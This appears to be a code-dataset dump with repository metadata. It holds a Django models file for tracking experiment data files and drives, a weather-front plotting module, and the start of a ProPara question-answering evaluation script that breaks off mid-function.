was added to the drive bay (optional).") size = models.IntegerField(blank=True, null=True, help_text="Size in bytes (optional).") start_recording = models.DateTimeField(blank=True, null=True, help_text="Time when the recording started (optional).") end_recording = models.DateTimeField(blank=True, null=True, help_text="Time when the recording ended (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this file (optional).") def __str__(self): """Returns the file path""" filepaths = set() n_copies = 0 # the number of copies for storagelocation in self.storagelocation_set.all(): filepaths.add(storagelocation.path) n_copies += 1 if n_copies == 1: return ', '.join(filepaths) + ' (1 copy)' return ', '.join(filepaths) + ' (%s copies)'%(int(n_copies)) class StorageLocation(models.Model): """ A location where a specific file is stored. This model/table links files and drives together. (Each file can be stored on multiple drives under different names). """ drive = models.ForeignKey(Drive, on_delete=models.CASCADE) file = models.ForeignKey(File, on_delete=models.CASCADE) path = models.CharField(max_length=300, help_text="Path of the file on the drive.")
33.883333
107
0.688269
from django.db import models from django.utils.encoding import python_2_unicode_compatible """ Contains the models/tables for the kumbhmela_db.sqlite3 database. Every field has (when necessary) a 'help_text' that explains the meaning of the field. """ __author__ = "Louis Dijkstra" @python_2_unicode_compatible class Drive(models.Model): """ Table/model to represent (a collection of) drive(s). """ label = models.CharField(max_length=50, help_text="Label added to the drive, e.g., 'kumbhmela_5'.") external = models.BooleanField(default=False, help_text="True when the drive is external and false otherwise.") time_added = models.DateTimeField(blank=True, null=True, help_text="Time when the drive was added to the drive bay.") time_removed = models.DateTimeField(blank=True, null=True, help_text="Time when the drive was removed from the drive bay.") whereabouts = models.TextField(max_length=1000, blank=True, help_text="Whereabouts of this drive copy, e.g., who had it lasts, where is it now etc. (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this (collection of) drive(s) (optional).") def __str__(self): return self.label @python_2_unicode_compatible class DriveCopy(models.Model): """ Every Drive might have several copies. This table/model is used to keep track of them. """ drive = models.ForeignKey(Drive, on_delete=models.CASCADE, help_text="The unique drive it is a copy of.") label = models.CharField(max_length=50, help_text="Label added to the drive, e.g., 'kumbhmela_5II'.") number = models.IntegerField(help_text="Drive copy number.") whereabouts = models.TextField(max_length=1000, blank=True, help_text="Whereabouts of this drive copy, e.g., who had it lasts, where is it now etc. (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this drive copy (optional).") def __str__(self): return self.label @python_2_unicode_compatible class Person(models.Model): """ Table/Model to represent a person """ name = models.CharField(max_length=100, help_text="First and last name.") email = models.CharField(max_length=200, blank=True, help_text="Email address(es) (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Notes (optional).") def __str__(self): return self.name @python_2_unicode_compatible class Experiment(models.Model): """ Table/Model to represent the various subexperiments """ # every experiment is linked to a contact person contactperson = models.ForeignKey(Person, on_delete=models.CASCADE, help_text="Main contact person for this subexperiment.") name = models.CharField(max_length=100, help_text="Name of the subexperiment.") number = models.IntegerField(help_text="Number of the subexperiment.") description = models.TextField(max_length=1000, blank=True, help_text="Short description of the experiment (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on the subexperiment (optional).") def __str__(self): return "%s (subexperiment %d)"%(self.name, self.number) @python_2_unicode_compatible class Format(models.Model): """ Table/model to represent a file format, i.e., the format in which output of a sensor is stored """ extension = models.CharField(max_length=50, help_text="Extension of the file (in small letters!), e.g., '.txt' and not '.TXT'.") description = models.TextField(max_length=10000, blank=True, help_text="Description of the file format (optional).") def __str__(self): return self.extension @python_2_unicode_compatible class 
Location(models.Model): """ Table/model to represent a (geo)location """ latitude = models.FloatField(blank=True, help_text="Optional.") longitude = models.FloatField(blank=True, help_text="Optional.") description = models.TextField(max_length=1000, blank=True, help_text="Description of the location (optional).") @python_2_unicode_compatible class Sensor(models.Model): """ Table/model to represent a sensor (e.g., camera/GPS device) """ sensor_type = models.CharField(max_length=100, help_text="Short description of the sensor, e.g., 'GoPro Camera'.") location = models.ManyToManyField(Location, blank=True, help_text="The location for this sensor (optional).") format = models.ManyToManyField(Format, blank=True, help_text="The format for the output of this sensor (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Notes for this sensor (optional).") def __str__(self): return self.sensor_type @python_2_unicode_compatible class Source(models.Model): """ Table/model to represent a data source (e.g., 'Local police') """ name = models.CharField(max_length=200, help_text="Name of the data source (e.g., 'Local Police')") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this data source (optional).") def __str__(self): return self.name @python_2_unicode_compatible class File(models.Model): """ The main table/model for this app. It is used to keep track of all files on the various drives for the Kumbh Mela experiment. """ # a file can be stored a several drives: drive = models.ManyToManyField(Drive, through='StorageLocation', help_text="The drives on which the file is stored.") format = models.ForeignKey(Format, on_delete=models.CASCADE, blank=True, null=True, help_text="Format of the file (optional).") experiment = models.ManyToManyField(Experiment, blank=True, help_text="The subexperiment this file belongs to (optional).") source = models.ForeignKey(Source, on_delete=models.CASCADE, blank=True, null=True, help_text="The data source (optional).") sensor = models.ForeignKey(Sensor, on_delete=models.CASCADE, blank=True, null=True, help_text="Sensor used to obtain the data (optional).") location = models.ForeignKey(Location, on_delete=models.CASCADE, blank=True, null=True, help_text="Location where the recording took place (optional).") time_added = models.DateTimeField(auto_now=True, blank=True, help_text="Time when the drive was added to the drive bay (optional).") size = models.IntegerField(blank=True, null=True, help_text="Size in bytes (optional).") start_recording = models.DateTimeField(blank=True, null=True, help_text="Time when the recording started (optional).") end_recording = models.DateTimeField(blank=True, null=True, help_text="Time when the recording ended (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this file (optional).") def __str__(self): """Returns the file path""" filepaths = set() n_copies = 0 # the number of copies for storagelocation in self.storagelocation_set.all(): filepaths.add(storagelocation.path) n_copies += 1 if n_copies == 1: return ', '.join(filepaths) + ' (1 copy)' return ', '.join(filepaths) + ' (%s copies)'%(int(n_copies)) class StorageLocation(models.Model): """ A location where a specific file is stored. This model/table links files and drives together. (Each file can be stored on multiple drives under different names). 
""" drive = models.ForeignKey(Drive, on_delete=models.CASCADE) file = models.ForeignKey(File, on_delete=models.CASCADE) path = models.CharField(max_length=300, help_text="Path of the file on the drive.") def __str__(self): return "File %s on Drive %s"%(self.path, self.drive.label)
231
0
195
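The File model in the record above reaches Drive only through the StorageLocation through-model, which is easy to miss when skimming. A minimal usage sketch, assuming the models live in a hypothetical kumbhmela_db.models module with migrations applied; the label and path values are made up:

from kumbhmela_db.models import Drive, File, StorageLocation  # hypothetical module path

# Register a drive and a file, then link them via the through model.
drive = Drive.objects.create(label="kumbhmela_5", external=True)
footage = File.objects.create(note="example file; every other field is optional")
StorageLocation.objects.create(drive=drive, file=footage,
                               path="/data/day1/cam3.mp4")

print(footage)              # "/data/day1/cam3.mp4 (1 copy)" via File.__str__
print(footage.drive.all())  # QuerySet of every drive holding a copy of this file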
7cbb4eae4e6ffdbfc230e0a6bca2576aecfb51ea
8,954
py
Python
generalexam/plotting/front_plotting.py
thunderhoser/GeneralExam
95b99a16fdaa67dae69586c7f7c76e27ccd4b89a
[ "MIT" ]
4
2019-05-10T11:03:48.000Z
2020-10-19T08:04:09.000Z
generalexam/plotting/front_plotting.py
thunderhoser/GeneralExam
95b99a16fdaa67dae69586c7f7c76e27ccd4b89a
[ "MIT" ]
null
null
null
generalexam/plotting/front_plotting.py
thunderhoser/GeneralExam
95b99a16fdaa67dae69586c7f7c76e27ccd4b89a
[ "MIT" ]
3
2020-11-19T08:16:31.000Z
2021-03-04T02:30:15.000Z
"""Plotting methods for warm and cold fronts.""" import numpy import matplotlib matplotlib.use('agg') import matplotlib.colors from gewittergefahr.gg_utils import longitude_conversion as lng_conversion from gewittergefahr.gg_utils import error_checking from generalexam.ge_utils import front_utils from generalexam.plotting import narr_plotting DEFAULT_WARM_FRONT_COLOUR = numpy.array([228., 26., 28.]) / 255 DEFAULT_COLD_FRONT_COLOUR = numpy.array([31., 120., 180.]) / 255 DEFAULT_LINE_WIDTH = 2. DEFAULT_LINE_STYLE = 'solid' DEFAULT_GRID_OPACITY = 0.5 DEFAULT_WF_MARKER_TYPE = 'o' DEFAULT_CF_MARKER_TYPE = '>' DEFAULT_MARKER_SPACING_METRES = 150000. DEFAULT_MARKER_SIZE = 12 DEFAULT_MARKER_COLOUR = numpy.array([31, 120, 180], dtype=float) / 255 def get_colour_map_for_grid(): """Returns colour map for frontal grid (to be used by `plot_frontal_grid`). N = number of colours :return: colour_map_object: Instance of `matplotlib.colors.ListedColormap`. :return: colour_norm_object: Instance of `matplotlib.colors.BoundaryNorm`. :return: colour_bounds: length-(N + 1) numpy array of colour boundaries. colour_bounds[0] and colour_bounds[1] are the boundaries for the 1st colour; colour_bounds[1] and colour_bounds[2] are the boundaries for the 2nd colour; ...; etc. """ main_colour_list = [DEFAULT_WARM_FRONT_COLOUR, DEFAULT_COLD_FRONT_COLOUR] colour_map_object = matplotlib.colors.ListedColormap(main_colour_list) colour_map_object.set_under(numpy.array([1., 1., 1.])) colour_map_object.set_over(numpy.array([1., 1., 1.])) main_colour_bounds = numpy.array( [front_utils.WARM_FRONT_INTEGER_ID - 0.5, front_utils.WARM_FRONT_INTEGER_ID + 0.5, front_utils.COLD_FRONT_INTEGER_ID]) colour_norm_object = matplotlib.colors.BoundaryNorm( main_colour_bounds, colour_map_object.N) colour_bounds = numpy.concatenate(( numpy.array([-100.]), main_colour_bounds, numpy.array([100.]))) return colour_map_object, colour_norm_object, colour_bounds def plot_front_with_markers( line_latitudes_deg, line_longitudes_deg, axes_object, basemap_object, marker_spacing_metres=DEFAULT_MARKER_SPACING_METRES, marker_type=None, front_type_string=None, marker_colour=DEFAULT_MARKER_COLOUR, marker_size=DEFAULT_MARKER_SIZE): """Plots front with markers (instead of a line). P = number of points in line :param line_latitudes_deg: length-P numpy array of latitudes (deg N). :param line_longitudes_deg: length-P numpy array of longitudes (deg E). :param axes_object: Front will be plotted on these axes (instance of `matplotlib.axes._subplots.AxesSubplot`). :param basemap_object: Basemap used to convert lat-long coordinates to x-y (instance of `mpl_toolkits.basemap.Basemap`). :param marker_spacing_metres: Spacing between successive markers. :param marker_type: Marker type (any format accepted by matplotlib). :param front_type_string: [used only if `marker_type is None`] Front type (determines marker type). :param marker_colour: Marker colour (any format accepted by matplotlib). :param marker_size: Marker size (any format accepted by matplotlib). """ error_checking.assert_is_valid_lat_numpy_array(line_latitudes_deg) error_checking.assert_is_numpy_array(line_latitudes_deg, num_dimensions=1) num_points = len(line_latitudes_deg) these_expected_dim = numpy.array([num_points], dtype=int) error_checking.assert_is_numpy_array( line_longitudes_deg, exact_dimensions=these_expected_dim) line_longitudes_deg = lng_conversion.convert_lng_positive_in_west( line_longitudes_deg) error_checking.assert_is_greater(marker_spacing_metres, 0.) 
if marker_type is None: front_utils.check_front_type(front_type_string) if front_type_string == front_utils.WARM_FRONT_STRING_ID: marker_type = DEFAULT_WF_MARKER_TYPE else: marker_type = DEFAULT_CF_MARKER_TYPE x_coords_metres, y_coords_metres = basemap_object( line_longitudes_deg, line_latitudes_deg) for i in range(num_points - 1): this_x_diff_metres = x_coords_metres[i + 1] - x_coords_metres[i] this_y_diff_metres = y_coords_metres[i + 1] - y_coords_metres[i] this_distance_metres = numpy.sqrt( this_x_diff_metres ** 2 + this_y_diff_metres ** 2) this_num_points = 1 + int(numpy.ceil( this_distance_metres / marker_spacing_metres )) these_x_coords_metres = numpy.linspace( x_coords_metres[i], x_coords_metres[i + 1], num=this_num_points) these_y_coords_metres = numpy.linspace( y_coords_metres[i], y_coords_metres[i + 1], num=this_num_points) axes_object.plot( these_x_coords_metres, these_y_coords_metres, linestyle='None', marker=marker_type, markerfacecolor=marker_colour, markeredgecolor=marker_colour, markersize=marker_size, markeredgewidth=0.1) def plot_polyline( latitudes_deg, longitudes_deg, basemap_object, axes_object, front_type=None, line_colour=None, line_width=DEFAULT_LINE_WIDTH, line_style=DEFAULT_LINE_STYLE): """Plots either warm front or cold front as polyline. P = number of points in polyline :param latitudes_deg: length-P numpy array of latitudes (deg N). :param longitudes_deg: length-P numpy array of longitudes (deg N). :param basemap_object: Instance of `mpl_toolkits.basemap.Basemap`. :param axes_object: Instance of `matplotlib.axes._subplots.AxesSubplot`. :param front_type: Type of front (string). Used only to determine line colour (if `line_colour` is left as None). :param line_colour: Colour (in any format accepted by `matplotlib.colors`). Defaults to `DEFAULT_WARM_FRONT_COLOUR` or `DEFAULT_COLD_FRONT_COLOUR`. :param line_width: Line width (real positive number). :param line_style: Line style (in any format accepted by `matplotlib.lines`). """ error_checking.assert_is_valid_lat_numpy_array(latitudes_deg) error_checking.assert_is_numpy_array(latitudes_deg, num_dimensions=1) num_points = len(latitudes_deg) longitudes_deg = lng_conversion.convert_lng_positive_in_west(longitudes_deg) error_checking.assert_is_numpy_array( longitudes_deg, exact_dimensions=numpy.array([num_points])) if line_colour is None: front_utils.check_front_type(front_type) if front_type == front_utils.WARM_FRONT_STRING_ID: line_colour = DEFAULT_WARM_FRONT_COLOUR else: line_colour = DEFAULT_COLD_FRONT_COLOUR x_coords_metres, y_coords_metres = basemap_object( longitudes_deg, latitudes_deg) axes_object.plot( x_coords_metres, y_coords_metres, color=line_colour, linestyle=line_style, linewidth=line_width) def plot_narr_grid( frontal_grid_matrix, axes_object, basemap_object, first_row_in_narr_grid=0, first_column_in_narr_grid=0, opacity=DEFAULT_GRID_OPACITY): """Plots NARR grid points intersected by a warm front or cold front. This method plots data over a contiguous subset of the NARR grid, which need not be *strictly* a subset. In other words, the "subset" could be the full NARR grid. :param frontal_grid_matrix: See documentation for `front_utils.frontal_grid_to_points`. :param axes_object: Instance of `matplotlib.axes._subplots.AxesSubplot`. :param basemap_object: Instance of `mpl_toolkits.basemap.Basemap`. :param first_row_in_narr_grid: Row 0 in the subgrid is row `first_row_in_narr_grid` in the full NARR grid. 
:param first_column_in_narr_grid: Column 0 in the subgrid is row `first_column_in_narr_grid` in the full NARR grid. :param opacity: Opacity for colour map (in range 0...1). """ error_checking.assert_is_integer_numpy_array(frontal_grid_matrix) error_checking.assert_is_numpy_array(frontal_grid_matrix, num_dimensions=2) error_checking.assert_is_geq_numpy_array( frontal_grid_matrix, numpy.min(front_utils.VALID_INTEGER_IDS) ) error_checking.assert_is_leq_numpy_array( frontal_grid_matrix, numpy.max(front_utils.VALID_INTEGER_IDS) ) colour_map_object, _, colour_bounds = get_colour_map_for_grid() frontal_grid_matrix = numpy.ma.masked_where( frontal_grid_matrix == front_utils.NO_FRONT_INTEGER_ID, frontal_grid_matrix) narr_plotting.plot_xy_grid( data_matrix=frontal_grid_matrix, axes_object=axes_object, basemap_object=basemap_object, colour_map=colour_map_object, colour_minimum=colour_bounds[1], colour_maximum=colour_bounds[-2], first_row_in_narr_grid=first_row_in_narr_grid, first_column_in_narr_grid=first_column_in_narr_grid, opacity=opacity)
42.436019
80
0.742573
"""Plotting methods for warm and cold fronts.""" import numpy import matplotlib matplotlib.use('agg') import matplotlib.colors from gewittergefahr.gg_utils import longitude_conversion as lng_conversion from gewittergefahr.gg_utils import error_checking from generalexam.ge_utils import front_utils from generalexam.plotting import narr_plotting DEFAULT_WARM_FRONT_COLOUR = numpy.array([228., 26., 28.]) / 255 DEFAULT_COLD_FRONT_COLOUR = numpy.array([31., 120., 180.]) / 255 DEFAULT_LINE_WIDTH = 2. DEFAULT_LINE_STYLE = 'solid' DEFAULT_GRID_OPACITY = 0.5 DEFAULT_WF_MARKER_TYPE = 'o' DEFAULT_CF_MARKER_TYPE = '>' DEFAULT_MARKER_SPACING_METRES = 150000. DEFAULT_MARKER_SIZE = 12 DEFAULT_MARKER_COLOUR = numpy.array([31, 120, 180], dtype=float) / 255 def get_colour_map_for_grid(): """Returns colour map for frontal grid (to be used by `plot_frontal_grid`). N = number of colours :return: colour_map_object: Instance of `matplotlib.colors.ListedColormap`. :return: colour_norm_object: Instance of `matplotlib.colors.BoundaryNorm`. :return: colour_bounds: length-(N + 1) numpy array of colour boundaries. colour_bounds[0] and colour_bounds[1] are the boundaries for the 1st colour; colour_bounds[1] and colour_bounds[2] are the boundaries for the 2nd colour; ...; etc. """ main_colour_list = [DEFAULT_WARM_FRONT_COLOUR, DEFAULT_COLD_FRONT_COLOUR] colour_map_object = matplotlib.colors.ListedColormap(main_colour_list) colour_map_object.set_under(numpy.array([1., 1., 1.])) colour_map_object.set_over(numpy.array([1., 1., 1.])) main_colour_bounds = numpy.array( [front_utils.WARM_FRONT_INTEGER_ID - 0.5, front_utils.WARM_FRONT_INTEGER_ID + 0.5, front_utils.COLD_FRONT_INTEGER_ID]) colour_norm_object = matplotlib.colors.BoundaryNorm( main_colour_bounds, colour_map_object.N) colour_bounds = numpy.concatenate(( numpy.array([-100.]), main_colour_bounds, numpy.array([100.]))) return colour_map_object, colour_norm_object, colour_bounds def plot_front_with_markers( line_latitudes_deg, line_longitudes_deg, axes_object, basemap_object, marker_spacing_metres=DEFAULT_MARKER_SPACING_METRES, marker_type=None, front_type_string=None, marker_colour=DEFAULT_MARKER_COLOUR, marker_size=DEFAULT_MARKER_SIZE): """Plots front with markers (instead of a line). P = number of points in line :param line_latitudes_deg: length-P numpy array of latitudes (deg N). :param line_longitudes_deg: length-P numpy array of longitudes (deg E). :param axes_object: Front will be plotted on these axes (instance of `matplotlib.axes._subplots.AxesSubplot`). :param basemap_object: Basemap used to convert lat-long coordinates to x-y (instance of `mpl_toolkits.basemap.Basemap`). :param marker_spacing_metres: Spacing between successive markers. :param marker_type: Marker type (any format accepted by matplotlib). :param front_type_string: [used only if `marker_type is None`] Front type (determines marker type). :param marker_colour: Marker colour (any format accepted by matplotlib). :param marker_size: Marker size (any format accepted by matplotlib). """ error_checking.assert_is_valid_lat_numpy_array(line_latitudes_deg) error_checking.assert_is_numpy_array(line_latitudes_deg, num_dimensions=1) num_points = len(line_latitudes_deg) these_expected_dim = numpy.array([num_points], dtype=int) error_checking.assert_is_numpy_array( line_longitudes_deg, exact_dimensions=these_expected_dim) line_longitudes_deg = lng_conversion.convert_lng_positive_in_west( line_longitudes_deg) error_checking.assert_is_greater(marker_spacing_metres, 0.) 
if marker_type is None: front_utils.check_front_type(front_type_string) if front_type_string == front_utils.WARM_FRONT_STRING_ID: marker_type = DEFAULT_WF_MARKER_TYPE else: marker_type = DEFAULT_CF_MARKER_TYPE x_coords_metres, y_coords_metres = basemap_object( line_longitudes_deg, line_latitudes_deg) for i in range(num_points - 1): this_x_diff_metres = x_coords_metres[i + 1] - x_coords_metres[i] this_y_diff_metres = y_coords_metres[i + 1] - y_coords_metres[i] this_distance_metres = numpy.sqrt( this_x_diff_metres ** 2 + this_y_diff_metres ** 2) this_num_points = 1 + int(numpy.ceil( this_distance_metres / marker_spacing_metres )) these_x_coords_metres = numpy.linspace( x_coords_metres[i], x_coords_metres[i + 1], num=this_num_points) these_y_coords_metres = numpy.linspace( y_coords_metres[i], y_coords_metres[i + 1], num=this_num_points) axes_object.plot( these_x_coords_metres, these_y_coords_metres, linestyle='None', marker=marker_type, markerfacecolor=marker_colour, markeredgecolor=marker_colour, markersize=marker_size, markeredgewidth=0.1) def plot_polyline( latitudes_deg, longitudes_deg, basemap_object, axes_object, front_type=None, line_colour=None, line_width=DEFAULT_LINE_WIDTH, line_style=DEFAULT_LINE_STYLE): """Plots either warm front or cold front as polyline. P = number of points in polyline :param latitudes_deg: length-P numpy array of latitudes (deg N). :param longitudes_deg: length-P numpy array of longitudes (deg N). :param basemap_object: Instance of `mpl_toolkits.basemap.Basemap`. :param axes_object: Instance of `matplotlib.axes._subplots.AxesSubplot`. :param front_type: Type of front (string). Used only to determine line colour (if `line_colour` is left as None). :param line_colour: Colour (in any format accepted by `matplotlib.colors`). Defaults to `DEFAULT_WARM_FRONT_COLOUR` or `DEFAULT_COLD_FRONT_COLOUR`. :param line_width: Line width (real positive number). :param line_style: Line style (in any format accepted by `matplotlib.lines`). """ error_checking.assert_is_valid_lat_numpy_array(latitudes_deg) error_checking.assert_is_numpy_array(latitudes_deg, num_dimensions=1) num_points = len(latitudes_deg) longitudes_deg = lng_conversion.convert_lng_positive_in_west(longitudes_deg) error_checking.assert_is_numpy_array( longitudes_deg, exact_dimensions=numpy.array([num_points])) if line_colour is None: front_utils.check_front_type(front_type) if front_type == front_utils.WARM_FRONT_STRING_ID: line_colour = DEFAULT_WARM_FRONT_COLOUR else: line_colour = DEFAULT_COLD_FRONT_COLOUR x_coords_metres, y_coords_metres = basemap_object( longitudes_deg, latitudes_deg) axes_object.plot( x_coords_metres, y_coords_metres, color=line_colour, linestyle=line_style, linewidth=line_width) def plot_narr_grid( frontal_grid_matrix, axes_object, basemap_object, first_row_in_narr_grid=0, first_column_in_narr_grid=0, opacity=DEFAULT_GRID_OPACITY): """Plots NARR grid points intersected by a warm front or cold front. This method plots data over a contiguous subset of the NARR grid, which need not be *strictly* a subset. In other words, the "subset" could be the full NARR grid. :param frontal_grid_matrix: See documentation for `front_utils.frontal_grid_to_points`. :param axes_object: Instance of `matplotlib.axes._subplots.AxesSubplot`. :param basemap_object: Instance of `mpl_toolkits.basemap.Basemap`. :param first_row_in_narr_grid: Row 0 in the subgrid is row `first_row_in_narr_grid` in the full NARR grid. 
:param first_column_in_narr_grid: Column 0 in the subgrid is row `first_column_in_narr_grid` in the full NARR grid. :param opacity: Opacity for colour map (in range 0...1). """ error_checking.assert_is_integer_numpy_array(frontal_grid_matrix) error_checking.assert_is_numpy_array(frontal_grid_matrix, num_dimensions=2) error_checking.assert_is_geq_numpy_array( frontal_grid_matrix, numpy.min(front_utils.VALID_INTEGER_IDS) ) error_checking.assert_is_leq_numpy_array( frontal_grid_matrix, numpy.max(front_utils.VALID_INTEGER_IDS) ) colour_map_object, _, colour_bounds = get_colour_map_for_grid() frontal_grid_matrix = numpy.ma.masked_where( frontal_grid_matrix == front_utils.NO_FRONT_INTEGER_ID, frontal_grid_matrix) narr_plotting.plot_xy_grid( data_matrix=frontal_grid_matrix, axes_object=axes_object, basemap_object=basemap_object, colour_map=colour_map_object, colour_minimum=colour_bounds[1], colour_maximum=colour_bounds[-2], first_row_in_narr_grid=first_row_in_narr_grid, first_column_in_narr_grid=first_column_in_narr_grid, opacity=opacity)
0
0
0
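A minimal usage sketch for plot_polyline from the record above, assuming mpl_toolkits.basemap is installed; the map corners and the front coordinates are made up:

import numpy
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
from generalexam.ge_utils import front_utils
from generalexam.plotting import front_plotting

_, axes_object = plt.subplots(1, 1, figsize=(10, 10))
basemap_object = Basemap(projection='cyl', resolution='l',
                         llcrnrlat=30., urcrnrlat=60.,
                         llcrnrlon=250., urcrnrlon=300.)
basemap_object.drawcoastlines(ax=axes_object)

# A short warm front running northeast across the domain (deg N, deg E).
latitudes_deg = numpy.array([40., 42., 45.])
longitudes_deg = numpy.array([265., 268., 272.])

front_plotting.plot_polyline(
    latitudes_deg=latitudes_deg, longitudes_deg=longitudes_deg,
    basemap_object=basemap_object, axes_object=axes_object,
    front_type=front_utils.WARM_FRONT_STRING_ID)

plt.savefig('warm_front.png')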
8688bd25c08e7e8ca794f9c3a84a55b513d0107f
20,875
py
Python
propara/evaluation/evalQA.py
keisks/propara
49fa8fe0481291df18b2c7b48e7ba1dafaad48e2
[ "Apache-2.0" ]
84
2018-06-02T02:00:53.000Z
2022-03-13T12:17:42.000Z
propara/evaluation/evalQA.py
keisks/propara
49fa8fe0481291df18b2c7b48e7ba1dafaad48e2
[ "Apache-2.0" ]
3
2018-10-31T00:28:31.000Z
2020-05-12T01:06:53.000Z
propara/evaluation/evalQA.py
keisks/propara
49fa8fe0481291df18b2c7b48e7ba1dafaad48e2
[ "Apache-2.0" ]
13
2018-09-14T20:37:51.000Z
2021-03-23T09:24:49.000Z
import sys, collections, pylev from stemming.porter2 import stem #-------------------------------------------------------------- # Author: Scott Wen-tau Yih # Usage: evalQA.py para-ids gold-labels system-predictions # example usage: python propara/eval/evalQA.py tests/fixtures/eval/para_id.test.txt tests/fixtures/eval/gold_labels.test.tsv tests/fixtures/eval/sample.model.test_predictions.tsv #-------------------------------------------------------------- # Data structure for Labels ''' PID -> [TurkerLabels] TurkerLabels = [TurkerQuestionLabel1, TurkerQuestionLabel2, ... ] # labels on the same paragraph from the same Turker TurkerQuestionLabel -> (SID, Participant, Type, From, To) ''' TurkerQuestionLabel = collections.namedtuple('TurkerQuestionLabel', 'sid participant event_type from_location to_location') # Data structure for Predictions ''' PID -> Participant -> SID -> PredictionRecord ''' PredictionRecord = collections.namedtuple('PredictionRecord', 'pid sid participant from_location to_location') # Fixing tokenization mismatch while alinging participants manual_participant_map = { 'alternating current':'alternate current', 'fixed nitrogen':'nitrogen', 'living things':'live thing', 'red giant star':'star', 'refrigerent liquid':'liquid', 'remains of living things':'remains of live thing', "retina's rods and cones":"retina 's rod and cone" } #, 'seedling':'seed'} #---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- ''' Read the gold file containing all records where an entity undergoes some state-change: create/destroy/move. ''' #---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- # Q1: Is participant X created during the process? # Q2: Participant X is created during the process. At which step is it created? # Q3: Participant X is created at step Y, and the initial location is known. Where is the participant after it is created? #---------------------------------------------------------------------------------------------------------------- # Q4: Is participant X destroyed during the process? # Q5: Participant X is destroyed during the process. At which step is it destroyed? # Q6: Participant X is destroyed at step Y, and its location before destroyed is known. Where is the participant right before it is destroyed? #---------------------------------------------------------------------------------------------------------------- # Q7 Does participant X move during the process? # Q8 Participant X moves during the process. At which steps does it move? # Q9 Participant X moves at step Y, and its location before step Y is known. What is its location before step Y? # Q10 Participant X moves at step Y, and its location after step Y is known. What is its location after step Y? 
#---------------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------------- if __name__ == "__main__": main()
42.689162
179
0.57988
import sys, collections, pylev from stemming.porter2 import stem #-------------------------------------------------------------- # Author: Scott Wen-tau Yih # Usage: evalQA.py para-ids gold-labels system-predictions # example usage: python propara/eval/evalQA.py tests/fixtures/eval/para_id.test.txt tests/fixtures/eval/gold_labels.test.tsv tests/fixtures/eval/sample.model.test_predictions.tsv #-------------------------------------------------------------- # Data structure for Labels ''' PID -> [TurkerLabels] TurkerLabels = [TurkerQuestionLabel1, TurkerQuestionLabel2, ... ] # labels on the same paragraph from the same Turker TurkerQuestionLabel -> (SID, Participant, Type, From, To) ''' TurkerQuestionLabel = collections.namedtuple('TurkerQuestionLabel', 'sid participant event_type from_location to_location') # Data structure for Predictions ''' PID -> Participant -> SID -> PredictionRecord ''' PredictionRecord = collections.namedtuple('PredictionRecord', 'pid sid participant from_location to_location') # Fixing tokenization mismatch while alinging participants manual_participant_map = { 'alternating current':'alternate current', 'fixed nitrogen':'nitrogen', 'living things':'live thing', 'red giant star':'star', 'refrigerent liquid':'liquid', 'remains of living things':'remains of live thing', "retina's rods and cones":"retina 's rod and cone" } #, 'seedling':'seed'} #---------------------------------------------------------------------------------------------------------------- def compare_to_gold_labels(participants, system_participants): ret = [] found = False for p in participants: p = p.lower() if p in system_participants: ret.append(p) continue for g in system_participants: if (pylev.levenshtein(p,g) < 3): #print (p, "===", g) ret.append(g) found = True if not found: if p in manual_participant_map: ret.append(manual_participant_map[p]) #else: # print("cannot find", p, system_participants) return ret def preprocess_locations(locations): ret = [] for loc in locations: if loc == '-': ret.append('null') elif loc == '?': ret.append('unk') else: ret.append(loc) return ret def preprocess_question_label(sid, participant, event_type, from_location, to_location, system_participants=None): # check if there are multiple participants grouped together participants = [x.strip() for x in participant.split(';')] # check if there are multiple locations grouped together from_locations = preprocess_locations([x.strip() for x in from_location.split(';')]) # check if there are multiple locations grouped together to_locations = preprocess_locations([x.strip() for x in to_location.split(';')]) #print(participant, participants, system_participants) if system_participants != None: # check if the participants are in his list participants = compare_to_gold_labels(participants, system_participants) #print("legit_participants =", participants) #print(from_location, from_locations) #print(to_location, to_locations) return [TurkerQuestionLabel(sid, p, event_type, floc, tloc) for p in participants for floc in from_locations for tloc in to_locations] #---------------------------------------------------------------------------------------------------------------- ''' Read the gold file containing all records where an entity undergoes some state-change: create/destroy/move. 
''' def readLabels(fnLab, selPid=None, gold_labels=None): fLab = open(fnLab) fLab.readline() # skip header ret = {} TurkerLabels = [] for ln in fLab: f = ln.rstrip().split('\t') if len(f) == 0 or len(f) == 1: if not selPid or pid in selPid: if pid not in ret: ret[pid] = [] ret[pid].append(TurkerLabels) TurkerLabels = [] elif len(f) != 11: sys.stderr.write("Error: the number of fields in this line is irregular: " + ln) sys.exit(-1) else: if f[1] == '?': continue pid, sid, participant, event_type, from_location, to_location = int(f[0]), int(f[1]), f[3], f[4], f[5], f[6] if gold_labels and selPid and pid in selPid: #print("pid=", pid) TurkerLabels += preprocess_question_label(sid, participant, event_type, from_location, to_location, gold_labels[pid].keys()) else: TurkerLabels += preprocess_question_label(sid, participant, event_type, from_location, to_location) #TurkerLabels += (TurkerQuestionLabel(sid, participant, event_type, from_location, to_location)) return ret #---------------------------------------------------------------------------------------------------------------- def readPredictions(fnPred): ret = {} for ln in open(fnPred): f = ln.rstrip().split('\t') pid, sid, participant, from_location, to_location = int(f[0]), int(f[1]), f[2], f[3], f[4] if pid not in ret: ret[pid] = {} dtPartPred = ret[pid] if participant not in dtPartPred: dtPartPred[participant] = {} dtPartPred[participant][sid] = PredictionRecord(pid, sid, participant, from_location, to_location) return ret #---------------------------------------------------------------------------------------------------------------- def readGold(fn): # read the gold label dtPar = {} for ln in open(fn): f = ln.rstrip().split('\t') parId, sentId, participant, before_after, labels = int(f[0]), int(f[1]), f[2], f[3], f[4:] if (before_after != "before") and (before_after != "after"): print("Error:", ln) sys.exit(-1) if sentId == 1 and before_after == "before": statusId = 0 elif before_after == 